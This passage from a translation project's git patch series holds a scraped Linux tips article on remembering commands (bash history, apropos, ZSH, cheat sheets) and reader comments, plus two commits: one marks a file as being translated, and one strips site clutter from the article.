+[grep](https://www.maketecheasier.com/remember-linux- +commands/)? Instead, you +get nothing. Again, apropos is being too literal. Now, try separating the +words and using the `-a` flag. + +[code] + + apropos "match" -a "pattern" +[/code] + +Suddenly, you have many of the results that you'd expect. + +apropos is a great tool, but you always need to be aware of its quirks. + +## ZSH + +![Linux ZSH +Autocomplete](https://www.maketecheasier.com/assets/uploads/2017/10/rc- +zsh.jpg)![Linux ZSH +Autocomplete](https://www.maketecheasier.com/assets/uploads/2017/10/rc- +zsh.jpg) + +ZSH isn't really a tool for remembering commands. It's actually an alternative +shell. You can substitute [ZSH](https://www.maketecheasier.com/remember-linux- +commands/) for Bash and use it as your command line shell. ZSH +includes an autocorrect feature that catches you if you enter in a command +wrong or misspell something. If you enable it, it'll ask you if you meant +something close. You can continue to use the command line as you normally +would with ZSH, but you get an extra safety net and some other really nice +features, too. The easiest way to get the most of ZSH is with [Oh-My- +ZSH](https://www.maketecheasier.com/remember-linux- +commands/). + +## Cheat Sheet + +The last, and probably simplest, option is to use a [cheat +sheet](https://www.maketecheasier.com/remember-linux- +commands/). There are plenty available online like [this +one](https://www.maketecheasier.com/remember-linux- +commands/) that you can use to look up commands quickly. + +![linux-commandline- +cheatsheet](https://www.maketecheasier.com/assets/uploads/2013/10/linux- +commandline-cheatsheet.gif)![linux-commandline- +cheatsheet](https://www.maketecheasier.com/assets/uploads/2013/10/linux- +commandline-cheatsheet.gif) + +You can actually even find them in image form and set one as your desktop +wallpaper for quick reference. + +This isn't the best solution for actually remembering the commands, but when +you're starting out, it can save you from doing a search online every time you +don't remember a command. + +Rely on these methods when you're learning, and eventually you'll find +yourself referring to them less and less. No one remembers everything, so +don't feel bad if you occasionally forget or run into something you haven't +seen before. That's what these resources and, of course, the Internet are +there for. + +Is this article useful? Yes No + +#### Related Ebooks + +[![The Beginner's Guide to +KDE](https://www.maketecheasier.com/assets/uploads/2017/03/kde-beginner-guide- +thumb.jpg)](https://www.maketecheasier.com/remember-linux- +commands/) + +[The Beginner's Guide to KDE](https://www.maketecheasier.com/remember-linux- +commands/) + +[![The Beginner's Guide to Linux Command +Line](https://www.maketecheasier.com/assets/uploads/2016/12/linux-command- +line-ebook-thumb.png)](https://www.maketecheasier.com/remember-linux- +commands/) + +[The Beginner's Guide to Linux Command +Line](https://www.maketecheasier.com/remember-linux- +commands/) + +[![The Complete Beginner's Guide to Ubuntu +16.04](https://www.maketecheasier.com/assets/uploads/2016/05/ubuntu- +beginner_thumb.jpg)](https://www.maketecheasier.com/remember-linux- +commands/) + +[The Complete Beginner's Guide to Ubuntu +16.04](https://www.maketecheasier.com/remember-linux- +commands/) + +## 9 comments + + 1. ![](https://secure.gravatar.com/avatar/3354c3ef91240202bd13908d3ac53783?s=64&d=https%3A%2F%2Fapi.uqnic.com%2Fdi%2F64x64%2F3354c3%2Ffff%26text%3DD&r=g) + +dragonmouth says + +"Unfortunately, there’s no getting around the fact that you need to learn the +commands" +Fortunately, that statement is not true. One can happily use Linux without +ever resorting to the use of command line. Knowing the commands helps but is +not absolutively necessary. To paraphrase the Kix cereal commercial "Silly +boy, Linux is not just for geeks" + +[Nov 17, 2017 at 9:20 am](https://www.maketecheasier.com/remember-linux- +commands/) Reply + + 1. ![](https://secure.gravatar.com/avatar/4c7f0cbd36fae02ce8816ff17627fa86?s=64&d=https%3A%2F%2Fapi.uqnic.com%2Fdi%2F64x64%2F4c7f0c%2Ffff%26text%3DB&r=g) + +Bonzadog says + +18.11.2017 + +No, dragonmouth, with some command line commands life could be difficult for +you. +It is available to know some command line commands - the above and nano, chmod +apt-get are worth at least a look at. + +[Nov 18, 2017 at 10:08 am](https://www.maketecheasier.com/remember-linux- +commands/) Reply + + 2. ![](https://secure.gravatar.com/avatar/4c7f0cbd36fae02ce8816ff17627fa86?s=64&d=https%3A%2F%2Fapi.uqnic.com%2Fdi%2F64x64%2F4c7f0c%2Ffff%26text%3DB&r=g) + +Bonzadog says + +My comment is riddles with errors caused by my new spelling checker and - +worse -me hitting submit without an adequate check: +Here a redo with the SC switched firmly off. + +No, dragonmouth, without some command line commands life could be difficult +for you. +It is available to know some command line commands - the above and nano, +chmod, apt-get are worth at least a look at. Learning is fun so grab a +book/cheat sheet/tutorial and bash (pardon the pun) away. + +[Nov 18, 2017 at 10:13 am](https://www.maketecheasier.com/remember-linux- +commands/) Reply + + 1. ![](https://secure.gravatar.com/avatar/3354c3ef91240202bd13908d3ac53783?s=64&d=https%3A%2F%2Fapi.uqnic.com%2Fdi%2F64x64%2F3354c3%2Ffff%26text%3DD&r=g) + +dragonmouth says + +"without some command line commands life could be difficult for you" +Not really. Just like Windows can be used perfectly well without resorting to +CLI, so can Linux. The mythical "average user" will use a GUI editor instead +of nano, GUI package manager instead of apt-get, will not be messing around +with permission via chmod. (S)he will not need to know the command history or +similar commands (apropos) if (s)he never uses CLI. Command line is for users +like you and me who like to tinker with their O/S and get under its hood. + +[Nov 19, 2017 at 7:44 am](https://www.maketecheasier.com/remember-linux- +commands/) Reply + + 1. ![](https://secure.gravatar.com/avatar/c3ed6851b70d51c384f99120711d6f6e?s=64&d=https%3A%2F%2Fapi.uqnic.com%2Fdi%2F64x64%2Fc3ed68%2Ffff%26text%3DL&r=g) + +LinuxLover says + +Agree. My wife is very non-techo and she can use Linux and Mac having never +touched a commandline. + +[Nov 19, 2017 at 6:24 pm](https://www.maketecheasier.com/remember-linux- +commands/) Reply + + 3. ![](https://secure.gravatar.com/avatar/a24bd22bcc2b433a590358c4af624707?s=64&d=https%3A%2F%2Fapi.uqnic.com%2Fdi%2F64x64%2Fa24bd2%2Ffff%26text%3DL&r=g) + +Liam says + +Have you ever learned a new word in your native language? Have you ever typed +an email? Have you ever done so using that new word and using proper grammar? +Did that seem like part of your everyday life? + +Using the command line in linux is much like that. It's just not that hard and +you might learn a little while you're at it. + +One -can- happily use linux without ever "resorting" to the us of command +line. The same is true of Android, IOS and Windows and in the pure GUI realm +it makes little difference which you choose. If you want to get all the +benefits of leaving the big corporate operating systems behind, do your self a +favor and learn to use the command line -some of the time-. I -almost- never +fire up linux without starting the graphical user interface. But I +-completely- never fire up the GUI without starting a command line window. + +Yeah, I'm a linux geek now. But when I started learning linux, I used the +command line exclusively and that was just fine (Caveat: I did so on a spare +computer that I could afford to wreck, although that never happened). + +[Nov 18, 2017 at 12:05 pm](https://www.maketecheasier.com/remember-linux- +commands/) Reply + + 4. ![](https://secure.gravatar.com/avatar/0a55a43591e9d2cd8453d0727314dc51?s=64&d=https%3A%2F%2Fapi.uqnic.com%2Fdi%2F64x64%2F589a70%2Ffff%26text%3DE&r=g) + +Eddie G. says + +I'm gonna have to agree with DragonMouth on this one. my mother who's 70+ had +a laptop given to her a while back, it was running Windows XP (that's how OLD +it is!!) Notice I say "is" and not "was"? She's still using that laptop to +this day, IIRC this laptop was given to her in 2011, and it ran Win XP. That +is….until it crashed (AGAIN!)….both my Mom and I were fed up with the OS, so I +installed Linux Mint on her laptop, and she's been using it ever since. +(2011….remember!!?) She's not EVER had to use the CLI for ANYTHING, at +ANYTIME. Since Linux Mint provides an updater with a GUI. And she even knows +how to handle the issues that pop up from time to time…(like when she's +prompted regarding a file and whether or not she wants to keep the original or +install the developer's version? etc.) so no. It is NOT necessary to learn ANY +command line whatsoever in order to use Linux. Does it make sense to learn it? +Yes. Definitely. Will it make you just a bit more handy when dealing with +Linux? Most certainly, people will turn to you when they have issues, and with +each situation you troubleshoot and resolve, you become more proficient with +both the various flavors of Linux and the command line. But is it ABSOLUTELY +NECESSARY to learn the command line in order to use Linux. No….No its not. +(Which is one of the reasons why I believe there's been more adoption of Linux +throughout the world!) + +[Nov 19, 2017 at 11:56 pm](https://www.maketecheasier.com/remember-linux- +commands/) Reply + + 1. ![](https://secure.gravatar.com/avatar/e2a054bf6bb7d43b4a8ce007dc435c49?s=64&d=https%3A%2F%2Fapi.uqnic.com%2Fdi%2F64x64%2F2a054b%2Ffff%26text%3DN&r=g) + +noman says + +Eddie G. Notice that you did say "was", not" is": +"it was running Windows XP" + +[Nov 20, 2017 at 4:38 am](https://www.maketecheasier.com/remember-linux- +commands/) Reply + + 1. ![](https://secure.gravatar.com/avatar/0a55a43591e9d2cd8453d0727314dc51?s=64&d=https%3A%2F%2Fapi.uqnic.com%2Fdi%2F64x64%2F589a70%2Ffff%26text%3DE&r=g) + +Eddie G. says + +Noman: I said it WAS running Windows XP, but that….THAT was how old it IS……to +point out the fact that not many people are still using hardware from 2011. I +was trying to show that you can install Linux on an old laptop and have it +work fine for a LONG TIME, with nothing more than the regular updates and +upgrades. And while I know (as do we all!) that some technology will die off +and be replaced by better, the standards are there and will be for a while. So +you could say….purchase a really decent machine today in 2017 and running +Linux?….along with regular updates and the like…..could well see that machine +into the year 2025! You can't do that with Windows. And I shouldn't say can't +but you wouldn't be able to without having to re-install your OS after getting +hit with something that had malicious intent!. + +[Nov 20, 2017 at 7:53 pm](https://www.maketecheasier.com/remember-linux- +commands/) Reply + +### Leave a Reply [Cancel reply](https://www.maketecheasier.com/remember- +linux-commands/) + +Yeah! You've decided to leave a comment. That's fantastic! Check out our +[comment policy](https://www.maketecheasier.com/remember-linux- +commands/) here. +Let's have a personal and meaningful conversation. + +Name: + +Email: + +Leave your comment here: + +Notify me of follow-up comments by email. + +Notify me of new posts by email. + +Leave this field blank. + +#### Popular Posts + +[![](https://www.maketecheasier.com/assets/uploads/2017/09/custom-linux- +distro-200x100.jpg)](https://www.maketecheasier.com/remember-linux- +commands/)[![](https://www.maketecheasier.com/assets/uploads/2017/09/custom- +linux-distro-200x100.jpg)](https://www.maketecheasier.com/remember-linux- +commands/) + +[8 Tools to Easily Create Your Own Custom Linux +Distro](https://www.maketecheasier.com/remember-linux- +commands/) + +[![](https://www.maketecheasier.com/assets/uploads/2017/09/Linux-productivity- +apps-00-Featured-200x100.jpg)](https://www.maketecheasier.com/remember-linux- +commands/)[![](https://www.maketecheasier.com/assets/uploads/2017/09/Linux- +productivity- +apps-00-Featured-200x100.jpg)](https://www.maketecheasier.com/remember-linux- +commands/) + +[10 Free Linux Productivity Apps You Haven't Heard +Of](https://www.maketecheasier.com/remember-linux- +commands/) + +[![](https://www.maketecheasier.com/assets/uploads/2017/09/zfs- +feat-194x100.jpg)](https://www.maketecheasier.com/remember-linux- +commands/)[![](https://www.maketecheasier.com/assets/uploads/2017/09/zfs- +feat-194x100.jpg)](https://www.maketecheasier.com/remember-linux- +commands/) + +[How to Use the ZFS Filesystem on Ubuntu +Linux](https://www.maketecheasier.com/remember-linux- +commands/) + +[![](https://www.maketecheasier.com/assets/uploads/2017/08/gauth- +feat-200x100.jpg)](https://www.maketecheasier.com/remember-linux- +commands/)[![](https://www.maketecheasier.com/assets/uploads/2017/08/gauth- +feat-200x100.jpg)](https://www.maketecheasier.com/remember-linux- +commands/) + +[How to Set Up Two-Factor Authentication in +Ubuntu](https://www.maketecheasier.com/remember-linux- +commands/) + +[![](https://www.maketecheasier.com/assets/uploads/2017/09/wine-games- +feat-200x100.jpg)](https://www.maketecheasier.com/remember-linux- +commands/)[![](https://www.maketecheasier.com/assets/uploads/2017/09/wine-games- +feat-200x100.jpg)](https://www.maketecheasier.com/remember-linux- +commands/) + +[10 Games You Can Play on Linux with +Wine](https://www.maketecheasier.com/remember-linux- +commands/) + +[![](https://www.maketecheasier.com/assets/uploads/2017/11/linux-distros- +gaming-200x100.jpg)](https://www.maketecheasier.com/remember-linux- +commands/)[![](https://www.maketecheasier.com/assets/uploads/2017/11/linux- +distros-gaming-200x100.jpg)](https://www.maketecheasier.com/remember-linux- +commands/) + +[5 of the Best Linux Distros for +Gaming](https://www.maketecheasier.com/remember-linux- +commands/) + +#### Get more stuff like this in your inbox + +Daily Update Weekly Roundup Deals & Giveaway Apps Discovery + +Subscribe Now + +we respect your privacy and take protecting it seriously + +[See All Newsletters »](https://www.maketecheasier.com/remember-linux- +commands/) + + * [__](https://www.maketecheasier.com/remember-linux-commands/) + * [__](https://www.maketecheasier.com/remember-linux-commands/) + * [__](https://www.maketecheasier.com/remember-linux-commands/) + * [__](https://www.maketecheasier.com/remember-linux-commands/) + * [__](https://www.maketecheasier.com/remember-linux-commands/) + * [__](https://www.maketecheasier.com/remember-linux-commands/) + + * [About](https://www.maketecheasier.com/remember-linux-commands/) + * [Contact](https://www.maketecheasier.com/remember-linux-commands/) + * [Advertise](https://www.maketecheasier.com/remember-linux-commands/) + * [Write For Us](https://www.maketecheasier.com/remember-linux-commands/) + * [Terms of Use](https://www.maketecheasier.com/remember-linux-commands/) + * [Privacy Policy](https://www.maketecheasier.com/remember-linux-commands/) + * [RSS Feed Terms](https://www.maketecheasier.com/remember-linux-commands/) + +(C) 2007 - 2017 Uqnic Network Pte Ltd. All rights reserved. +[Make Tech Easier](https://www.maketecheasier.com/remember-linux- +commands/) is a member of the Uqnic Network. + +__ + + +-------------------------------------------------------------------------------- + +via: https://www.maketecheasier.com/remember-linux-commands/ + +作者:[Eric Raymond ][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + From 0a057e7babf62dc416c4009e2183efc92a62439e Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E4=BB=98=E5=B3=A5?= <24203166+fuzheng1998@users.noreply.github.com> Date: Tue, 28 Nov 2017 12:34:50 +0800 Subject: [PATCH 0022/1627] fuzheng1998 translating MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit 翻译中 --- ... Study of Programming Languages and Code Quality in GitHub.md | 1 + 1 file changed, 1 insertion(+) diff --git a/sources/tech/20171007 A Large-Scale Study of Programming Languages and Code Quality in GitHub.md b/sources/tech/20171007 A Large-Scale Study of Programming Languages and Code Quality in GitHub.md index 22986eaa19..1e02fe5430 100644 --- a/sources/tech/20171007 A Large-Scale Study of Programming Languages and Code Quality in GitHub.md +++ b/sources/tech/20171007 A Large-Scale Study of Programming Languages and Code Quality in GitHub.md @@ -1,3 +1,4 @@ +fuzheng1998 translating A Large-Scale Study of Programming Languages and Code Quality in GitHub ============================================================ From 7557bbe8d93510ba5cf94f8aa8a712963e76b393 Mon Sep 17 00:00:00 2001 From: darksun Date: Tue, 28 Nov 2017 12:40:49 +0800 Subject: [PATCH 0023/1627] =?UTF-8?q?=E4=BF=AE=E6=AD=A3=E6=A0=BC=E5=BC=8F?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...7 How to Easily Remember Linux Commands.md | 499 +----------------- 1 file changed, 10 insertions(+), 489 deletions(-) diff --git a/sources/tech/20171117 How to Easily Remember Linux Commands.md b/sources/tech/20171117 How to Easily Remember Linux Commands.md index 718ad5dea0..7bb68a10fd 100644 --- a/sources/tech/20171117 How to Easily Remember Linux Commands.md +++ b/sources/tech/20171117 How to Easily Remember Linux Commands.md @@ -1,136 +1,7 @@ -Skip to content - -[ ![Make Tech -Easier](https://www.maketecheasier.com/assets/themes/MTE-10/images/mtelogo.svg) -](https://www.maketecheasier.com/remember-linux- -commands/) - - * [__](https://www.maketecheasier.com/remember-linux-commands/) - -Search __ - - * Sign In - -My Favorites - -Sign up or login to view your favorites! - -Log in - -[Forgot your password?](https://www.maketecheasier.com/remember-linux- -commands/) - -Sign up to comment and more Sign up - - * [How-To ](https://www.maketecheasier.com/remember-linux-commands/) - - * Categories - * [ __Windows](https://www.maketecheasier.com/remember-linux-commands/) - * [ __Linux](https://www.maketecheasier.com/remember-linux-commands/) - * [ __Mac](https://www.maketecheasier.com/remember-linux-commands/) - * [ __Mobile](https://www.maketecheasier.com/remember-linux-commands/) - * [ __Android](https://www.maketecheasier.com/remember-linux-commands/) - * [ __iOS](https://www.maketecheasier.com/remember-linux-commands/) - * [ __Web](https://www.maketecheasier.com/remember-linux-commands/) - * [ __Browsers](https://www.maketecheasier.com/remember-linux-commands/) - * [ __WordPress](https://www.maketecheasier.com/remember-linux-commands/) - * [ __Gadgets](https://www.maketecheasier.com/remember-linux-commands/) - * [ __Hardware Guides](https://www.maketecheasier.com/remember-linux-commands/) - * [ __How Things Work](https://www.maketecheasier.com/remember-linux-commands/) - * [ __All Categories](https://www.maketecheasier.com/remember-linux-commands/) - - * Series - * [Understanding Android ROM](https://www.maketecheasier.com/remember-linux-commands/) - * [Apache Server Guide](https://www.maketecheasier.com/remember-linux-commands/) - * [Hardware Buying Guide](https://www.maketecheasier.com/remember-linux-commands/) - * [iOS Beginner Guide](https://www.maketecheasier.com/remember-linux-commands/) - * [Windows Alternative Apps](https://www.maketecheasier.com/remember-linux-commands/) - * [Linux Desktop Themes](https://www.maketecheasier.com/remember-linux-commands/) - * [Mastering WordPress](https://www.maketecheasier.com/remember-linux-commands/) - * [Mastering RAID](https://www.maketecheasier.com/remember-linux-commands/) - * [ All Series](https://www.maketecheasier.com/remember-linux-commands/) - - * [Software](https://www.maketecheasier.com/remember-linux-commands/) - * [ebooks](https://www.maketecheasier.com/remember-linux-commands/) - * [Deals](https://www.maketecheasier.com/remember-linux-commands/) - * [Giveaway](https://www.maketecheasier.com/remember-linux-commands/) - * More - - * About Us - * [About Us](https://www.maketecheasier.com/remember-linux-commands/) - * [RSS Feed Terms](https://www.maketecheasier.com/remember-linux-commands/) - * [Contact Us](https://www.maketecheasier.com/remember-linux-commands/) - * [Privacy Policy](https://www.maketecheasier.com/remember-linux-commands/) - * [Advertise with us](https://www.maketecheasier.com/remember-linux-commands/) - * [Terms of Service](https://www.maketecheasier.com/remember-linux-commands/) - - * Follow Us - * [ __RSS](https://www.maketecheasier.com/remember-linux-commands/) - * [ __Facebook](https://www.maketecheasier.com/remember-linux-commands/) - * [ __Twitter](https://www.maketecheasier.com/remember-linux-commands/) - * [ __Google+](https://www.maketecheasier.com/remember-linux-commands/) - * [ __Instagram](https://www.maketecheasier.com/remember-linux-commands/) - * [ __Pinterest](https://www.maketecheasier.com/remember-linux-commands/) - * [ __Youtube](https://www.maketecheasier.com/remember-linux-commands/) - -__ - -__Hi there, -Log in | Sign up - - * Section - * [Windows](https://www.maketecheasier.com/remember-linux-commands/) - * [Linux](https://www.maketecheasier.com/remember-linux-commands/) - * [Mac](https://www.maketecheasier.com/remember-linux-commands/) - * [Mobile](https://www.maketecheasier.com/remember-linux-commands/) - * [Android](https://www.maketecheasier.com/remember-linux-commands/) - * [iOS](https://www.maketecheasier.com/remember-linux-commands/) - * [Internet](https://www.maketecheasier.com/remember-linux-commands/) - * [Browsers](https://www.maketecheasier.com/remember-linux-commands/) - * [WordPress](https://www.maketecheasier.com/remember-linux-commands/) - * [Gadgets](https://www.maketecheasier.com/remember-linux-commands/) - * [Hardware Guides](https://www.maketecheasier.com/remember-linux-commands/) - * [How Things Work](https://www.maketecheasier.com/remember-linux-commands/) - * [All Categories](https://www.maketecheasier.com/remember-linux-commands/) - - * Sites - * [MTE Premium](https://www.maketecheasier.com/remember-linux-commands/) - * [Software Discovery](https://www.maketecheasier.com/remember-linux-commands/) - * [Ebooks](https://www.maketecheasier.com/remember-linux-commands/) - * [Deals](https://www.maketecheasier.com/remember-linux-commands/) - * About Us - * [About Us](https://www.maketecheasier.com/remember-linux-commands/) - * [Advertise with us](https://www.maketecheasier.com/remember-linux-commands/) - * [Contact Us](https://www.maketecheasier.com/remember-linux-commands/) - * [Privacy Policy](https://www.maketecheasier.com/remember-linux-commands/) - * [Terms of Service](https://www.maketecheasier.com/remember-linux-commands/) - * [RSS Feed Terms](https://www.maketecheasier.com/remember-linux-commands/) - - * [ __](https://www.maketecheasier.com/remember-linux-commands/) - * [ __](https://www.maketecheasier.com/remember-linux-commands/) - * [ __](https://www.maketecheasier.com/remember-linux-commands/) - * [ __](https://www.maketecheasier.com/remember-linux-commands/) - * [ __](https://www.maketecheasier.com/remember-linux-commands/) - * [ __](https://www.maketecheasier.com/remember-linux-commands/) - # How to Easily Remember Linux Commands ![](https://www.maketecheasier.com/assets/uploads/2017/10/rc-feat.jpg) -__[ Nick Congleton](https://www.maketecheasier.com/remember-linux- -commands/) __17th Nov -2017 __[Linux](https://www.maketecheasier.com/remember-linux- -commands/) __ [9 -Comments](https://www.maketecheasier.com/remember-linux- -commands/) - - * [__Share](https://www.maketecheasier.com/remember-linux-commands/ "Share this article in Facebook") - * [__Tweet](https://www.maketecheasier.com/remember-linux-commands/ "Share this article in Twitter") - * [__Email](https://www.maketecheasier.com/remember-linux-commands/ "Email this article to your friends") - - * __ - * [__](https://www.maketecheasier.com/remember-linux-commands/ "Previous article: Lifetime Access to Microsoft Office Mastery Bundle for Only $49") - * [__](https://www.maketecheasier.com/remember-linux-commands/ "Next article: How to Automatically Disable WiFi When Connected to a Wired Connection") The command line can be daunting for new Linux users. Part of that is remembering the multitude of commands available. After all, in order to use @@ -142,16 +13,10 @@ started. ## History -![Linux Bash History -Commands](https://www.maketecheasier.com/assets/uploads/2017/10/rc-bash- -history.jpg)![Linux Bash History -Commands](https://www.maketecheasier.com/assets/uploads/2017/10/rc-bash- -history.jpg) +![Linux Bash History Commands](https://www.maketecheasier.com/assets/uploads/2017/10/rc-bash-history.jpg) The first thing you can use to remember commands that you've already used is -your own command line history. Most [Linux -shells](https://www.maketecheasier.com/remember-linux- -commands/), including +your own command line history. Most [Linux shells](https://www.maketecheasier.com/remember-linux-commands/), including the most common default, Bash, create a history file that lists your past commands. For Bash, you can find it at "/home//.bash_history." @@ -170,9 +35,7 @@ contents of a directory, you can run the following command: apropos "list directory" [/code] -![Linux Apropos](https://www.maketecheasier.com/assets/uploads/2017/10/rc- -apropos.jpg)![Linux -Apropos](https://www.maketecheasier.com/assets/uploads/2017/10/rc-apropos.jpg) +![Linux Apropos](https://www.maketecheasier.com/assets/uploads/2017/10/rc-apropos.jpg) There's a catch, though. It's very literal. Add an "s" to "directory," and try again. @@ -194,14 +57,10 @@ together search terms in a more flexible way. Try this command: apropos "match pattern" [/code] -![Linux Apropos -a -Flag](https://www.maketecheasier.com/assets/uploads/2017/10/rc- -apropos-a.jpg)![Linux Apropos -a -Flag](https://www.maketecheasier.com/assets/uploads/2017/10/rc-apropos-a.jpg) +![Linux Apropos -a Flag](https://www.maketecheasier.com/assets/uploads/2017/10/rc-apropos-a.jpg) You'd think it'd turn up something, like -[grep](https://www.maketecheasier.com/remember-linux- -commands/)? Instead, you +[grep](https://www.maketecheasier.com/remember-linux-commands/)? Instead, you get nothing. Again, apropos is being too literal. Now, try separating the words and using the `-a` flag. @@ -231,24 +90,14 @@ wrong or misspell something. If you enable it, it'll ask you if you meant something close. You can continue to use the command line as you normally would with ZSH, but you get an extra safety net and some other really nice features, too. The easiest way to get the most of ZSH is with [Oh-My- -ZSH](https://www.maketecheasier.com/remember-linux- -commands/). +ZSH](https://www.maketecheasier.com/remember-linux-commands/). ## Cheat Sheet -The last, and probably simplest, option is to use a [cheat -sheet](https://www.maketecheasier.com/remember-linux- -commands/). There are plenty available online like [this -one](https://www.maketecheasier.com/remember-linux- -commands/) that you can use to look up commands quickly. +The last, and probably simplest, option is to use a [cheat sheet](https://www.maketecheasier.com/remember-linux-commands/). There are plenty available online like [this +one](https://www.maketecheasier.com/remember-linux-commands/) that you can use to look up commands quickly. -![linux-commandline- -cheatsheet](https://www.maketecheasier.com/assets/uploads/2013/10/linux- -commandline-cheatsheet.gif)![linux-commandline- -cheatsheet](https://www.maketecheasier.com/assets/uploads/2013/10/linux- -commandline-cheatsheet.gif) +![linux-commandline-cheatsheet](https://www.maketecheasier.com/assets/uploads/2013/10/linux-commandline-cheatsheet.gif) You can actually even find them in image form and set one as your desktop wallpaper for quick reference. @@ -263,340 +112,12 @@ don't feel bad if you occasionally forget or run into something you haven't seen before. That's what these resources and, of course, the Internet are there for. -Is this article useful? Yes No - -#### Related Ebooks - -[![The Beginner's Guide to -KDE](https://www.maketecheasier.com/assets/uploads/2017/03/kde-beginner-guide- -thumb.jpg)](https://www.maketecheasier.com/remember-linux- -commands/) - -[The Beginner's Guide to KDE](https://www.maketecheasier.com/remember-linux- -commands/) - -[![The Beginner's Guide to Linux Command -Line](https://www.maketecheasier.com/assets/uploads/2016/12/linux-command- -line-ebook-thumb.png)](https://www.maketecheasier.com/remember-linux- -commands/) - -[The Beginner's Guide to Linux Command -Line](https://www.maketecheasier.com/remember-linux- -commands/) - -[![The Complete Beginner's Guide to Ubuntu -16.04](https://www.maketecheasier.com/assets/uploads/2016/05/ubuntu- -beginner_thumb.jpg)](https://www.maketecheasier.com/remember-linux- -commands/) - -[The Complete Beginner's Guide to Ubuntu -16.04](https://www.maketecheasier.com/remember-linux- -commands/) - -## 9 comments - - 1. ![](https://secure.gravatar.com/avatar/3354c3ef91240202bd13908d3ac53783?s=64&d=https%3A%2F%2Fapi.uqnic.com%2Fdi%2F64x64%2F3354c3%2Ffff%26text%3DD&r=g) - -dragonmouth says - -"Unfortunately, there’s no getting around the fact that you need to learn the -commands" -Fortunately, that statement is not true. One can happily use Linux without -ever resorting to the use of command line. Knowing the commands helps but is -not absolutively necessary. To paraphrase the Kix cereal commercial "Silly -boy, Linux is not just for geeks" - -[Nov 17, 2017 at 9:20 am](https://www.maketecheasier.com/remember-linux- -commands/) Reply - - 1. ![](https://secure.gravatar.com/avatar/4c7f0cbd36fae02ce8816ff17627fa86?s=64&d=https%3A%2F%2Fapi.uqnic.com%2Fdi%2F64x64%2F4c7f0c%2Ffff%26text%3DB&r=g) - -Bonzadog says - -18.11.2017 - -No, dragonmouth, with some command line commands life could be difficult for -you. -It is available to know some command line commands - the above and nano, chmod -apt-get are worth at least a look at. - -[Nov 18, 2017 at 10:08 am](https://www.maketecheasier.com/remember-linux- -commands/) Reply - - 2. ![](https://secure.gravatar.com/avatar/4c7f0cbd36fae02ce8816ff17627fa86?s=64&d=https%3A%2F%2Fapi.uqnic.com%2Fdi%2F64x64%2F4c7f0c%2Ffff%26text%3DB&r=g) - -Bonzadog says - -My comment is riddles with errors caused by my new spelling checker and - -worse -me hitting submit without an adequate check: -Here a redo with the SC switched firmly off. - -No, dragonmouth, without some command line commands life could be difficult -for you. -It is available to know some command line commands - the above and nano, -chmod, apt-get are worth at least a look at. Learning is fun so grab a -book/cheat sheet/tutorial and bash (pardon the pun) away. - -[Nov 18, 2017 at 10:13 am](https://www.maketecheasier.com/remember-linux- -commands/) Reply - - 1. ![](https://secure.gravatar.com/avatar/3354c3ef91240202bd13908d3ac53783?s=64&d=https%3A%2F%2Fapi.uqnic.com%2Fdi%2F64x64%2F3354c3%2Ffff%26text%3DD&r=g) - -dragonmouth says - -"without some command line commands life could be difficult for you" -Not really. Just like Windows can be used perfectly well without resorting to -CLI, so can Linux. The mythical "average user" will use a GUI editor instead -of nano, GUI package manager instead of apt-get, will not be messing around -with permission via chmod. (S)he will not need to know the command history or -similar commands (apropos) if (s)he never uses CLI. Command line is for users -like you and me who like to tinker with their O/S and get under its hood. - -[Nov 19, 2017 at 7:44 am](https://www.maketecheasier.com/remember-linux- -commands/) Reply - - 1. ![](https://secure.gravatar.com/avatar/c3ed6851b70d51c384f99120711d6f6e?s=64&d=https%3A%2F%2Fapi.uqnic.com%2Fdi%2F64x64%2Fc3ed68%2Ffff%26text%3DL&r=g) - -LinuxLover says - -Agree. My wife is very non-techo and she can use Linux and Mac having never -touched a commandline. - -[Nov 19, 2017 at 6:24 pm](https://www.maketecheasier.com/remember-linux- -commands/) Reply - - 3. ![](https://secure.gravatar.com/avatar/a24bd22bcc2b433a590358c4af624707?s=64&d=https%3A%2F%2Fapi.uqnic.com%2Fdi%2F64x64%2Fa24bd2%2Ffff%26text%3DL&r=g) - -Liam says - -Have you ever learned a new word in your native language? Have you ever typed -an email? Have you ever done so using that new word and using proper grammar? -Did that seem like part of your everyday life? - -Using the command line in linux is much like that. It's just not that hard and -you might learn a little while you're at it. - -One -can- happily use linux without ever "resorting" to the us of command -line. The same is true of Android, IOS and Windows and in the pure GUI realm -it makes little difference which you choose. If you want to get all the -benefits of leaving the big corporate operating systems behind, do your self a -favor and learn to use the command line -some of the time-. I -almost- never -fire up linux without starting the graphical user interface. But I --completely- never fire up the GUI without starting a command line window. - -Yeah, I'm a linux geek now. But when I started learning linux, I used the -command line exclusively and that was just fine (Caveat: I did so on a spare -computer that I could afford to wreck, although that never happened). - -[Nov 18, 2017 at 12:05 pm](https://www.maketecheasier.com/remember-linux- -commands/) Reply - - 4. ![](https://secure.gravatar.com/avatar/0a55a43591e9d2cd8453d0727314dc51?s=64&d=https%3A%2F%2Fapi.uqnic.com%2Fdi%2F64x64%2F589a70%2Ffff%26text%3DE&r=g) - -Eddie G. says - -I'm gonna have to agree with DragonMouth on this one. my mother who's 70+ had -a laptop given to her a while back, it was running Windows XP (that's how OLD -it is!!) Notice I say "is" and not "was"? She's still using that laptop to -this day, IIRC this laptop was given to her in 2011, and it ran Win XP. That -is….until it crashed (AGAIN!)….both my Mom and I were fed up with the OS, so I -installed Linux Mint on her laptop, and she's been using it ever since. -(2011….remember!!?) She's not EVER had to use the CLI for ANYTHING, at -ANYTIME. Since Linux Mint provides an updater with a GUI. And she even knows -how to handle the issues that pop up from time to time…(like when she's -prompted regarding a file and whether or not she wants to keep the original or -install the developer's version? etc.) so no. It is NOT necessary to learn ANY -command line whatsoever in order to use Linux. Does it make sense to learn it? -Yes. Definitely. Will it make you just a bit more handy when dealing with -Linux? Most certainly, people will turn to you when they have issues, and with -each situation you troubleshoot and resolve, you become more proficient with -both the various flavors of Linux and the command line. But is it ABSOLUTELY -NECESSARY to learn the command line in order to use Linux. No….No its not. -(Which is one of the reasons why I believe there's been more adoption of Linux -throughout the world!) - -[Nov 19, 2017 at 11:56 